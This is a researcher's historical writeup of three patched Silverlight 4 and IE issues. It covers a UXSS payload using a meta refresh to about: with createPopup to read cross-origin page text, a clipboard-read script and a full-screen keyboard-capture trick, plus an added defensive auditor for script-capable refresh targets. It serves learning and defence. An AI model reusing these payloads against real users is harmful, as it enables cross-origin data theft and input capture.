A collection of proof-of-concept findings from the first Silverlight 4 security assessment. The compiled SL4_PoCs.xap contains the Silverlight-side code; the HTML files demonstrate three distinct issues found during this review.

PoC 01 — UXSS via about: Navigation with createPopup

A <meta http-equiv="refresh"> that navigates to an about: URL carrying inline script can bypass the browser's cross-origin restrictions when a createPopup() popup is used to override the alert method. The popup's document context is less restricted, so the injected script can read parent.document.body.innerText across origins.

<meta http-equiv="refresh" content="0;url=about:<script>
    var newTrident = createPopup()%3b
    window.alert = newTrident.document.parentWindow.alert%3b
    alert(   'document.domain = ' + document.domain + '\n' +
             'parent.location = ' + parent.location + '\n' +
             'parent.document.body.innerText = ' + parent.document.body.innerText
         )
</script>">
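
As an added defensive example, not part of the original PoC set or the SL4_PoCs.xap code: a small JavaScript auditor that flags <meta http-equiv="refresh"> tags whose target uses a scheme that can carry inline script (about:, javascript:, data:, vbscript:), which is the ingredient PoC 01 depends on. The sample markup, the function names and the scheme list are constructed for this example; it uses only string parsing, so it runs under Node without a DOM and can be pointed at served or user-supplied HTML.

```javascript
// Added defensive example (not part of the original PoC set): scan markup for
// <meta http-equiv="refresh"> tags whose target URL uses a scheme that can carry
// inline script. PoC 01 above relies on exactly such a target (about:<script>).
// Pure string parsing, so it runs under Node without a DOM.

// Schemes whose URL body can execute as script in the navigated document.
// (Constructed list for this example; extend to taste.)
const SCRIPT_CAPABLE_SCHEMES = ["about", "javascript", "data", "vbscript"];

// Return every <meta ...> tag. Quoted attribute values may contain '>' (the
// PoC's content attribute does), so quoted runs are consumed as a unit.
function findMetaTags(html) {
  const re = /<meta\b(?:[^>"']|"[^"]*"|'[^']*')*>/gi;
  const tags = [];
  let m;
  while ((m = re.exec(html)) !== null) tags.push(m[0]);
  return tags;
}

// Read one attribute from a tag string; handles "..", '..' and unquoted values.
function getAttr(tag, name) {
  const re = new RegExp(
    "(?:^|\\s)" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i");
  const m = re.exec(tag);
  if (!m) return null;
  return m[1] !== undefined ? m[1] : m[2] !== undefined ? m[2] : m[3];
}

// Extract the URL from a refresh "content" value: "<delay>[;,] [url=] <url>".
// Returns null when the tag only reloads the current page (delay-only form).
function parseRefreshTarget(content) {
  const m = /^\s*\d*\s*(?:[;,]\s*)?(?:url\s*=\s*)?['"]?([\s\S]*?)['"]?\s*$/i.exec(content);
  return m && m[1] !== "" ? m[1] : null;
}

// Normalise a target and return its scheme in lower case, or null if relative.
// Percent-decoding is applied first (conservative: the PoC hides ';' as %3b),
// and ASCII tab/newline are dropped because browsers strip them before parsing.
function urlScheme(url) {
  let s = url;
  try { s = decodeURIComponent(s); } catch (e) { /* malformed escape: keep raw */ }
  s = s.replace(/[\t\n\r]/g, "").replace(/^[\u0000-\u0020]+/, "");
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : null;
}

// Audit one HTML document; returns one finding per script-capable refresh target.
function auditRefreshTargets(html) {
  const findings = [];
  for (const tag of findMetaTags(html)) {
    const equiv = getAttr(tag, "http-equiv");
    if (equiv === null || equiv.trim().toLowerCase() !== "refresh") continue;
    const content = getAttr(tag, "content");
    if (content === null) continue;
    const target = parseRefreshTarget(content);
    if (target === null) continue;
    const scheme = urlScheme(target);
    if (scheme !== null && SCRIPT_CAPABLE_SCHEMES.includes(scheme)) {
      findings.push({ scheme, target: target.replace(/\s+/g, " ").slice(0, 60) });
    }
  }
  return findings;
}

// Constructed sample page: one benign refresh, one delay-only refresh, a non-refresh
// meta, and two script-capable targets (the second has a newline inside its scheme,
// which the browser ignores, so the auditor must too).
const SAMPLE_HTML = [
  "<html><head>",
  '<meta http-equiv="refresh" content="0;url=about:<script>var p = createPopup()%3b alert(1)</script>">',
  "<meta http-equiv=\"Refresh\" content=\"5; URL='https://example.test/next'\">",
  '<meta http-equiv="refresh" content="30">',
  '<meta name="description" content="javascript:not a refresh target">',
  '<META HTTP-EQUIV=refresh CONTENT="0;url=java\nscript:alert(1)">',
  "</head></html>",
].join("\n");

console.log(auditRefreshTargets(SAMPLE_HTML));
// → two findings, schemes "about" and "javascript"
```

The decode-then-strip order is deliberate: it is conservative (a target is flagged if any browser-like normalisation would turn it into a script-capable scheme), which is the right bias for an auditor but would be too noisy for a blocking filter without a proper URL parser behind it.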

PoC 02 — Clipboard Read

A Silverlight 4 application running in full trust (or with certain elevated permissions) could read clipboard contents directly.

<script>
alert("Here's the clipboard:\n\n" + clipboardData.getData("Text"));
</script>

PoC 03 — Full Screen Keyboard Capture

When a Silverlight control is in full-screen mode and a textarea has focus, the Escape key no longer exits full screen. This lets a page keep capturing keyboard input while presenting a convincing full-screen experience.

<textarea style="width:500px;height:160px;">
Press the Full Screen button at the very top of this window,
and then write inside this textbox at will.

When the focus is here, you can't get out of fullscreen by pressing Escape.
</textarea>

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.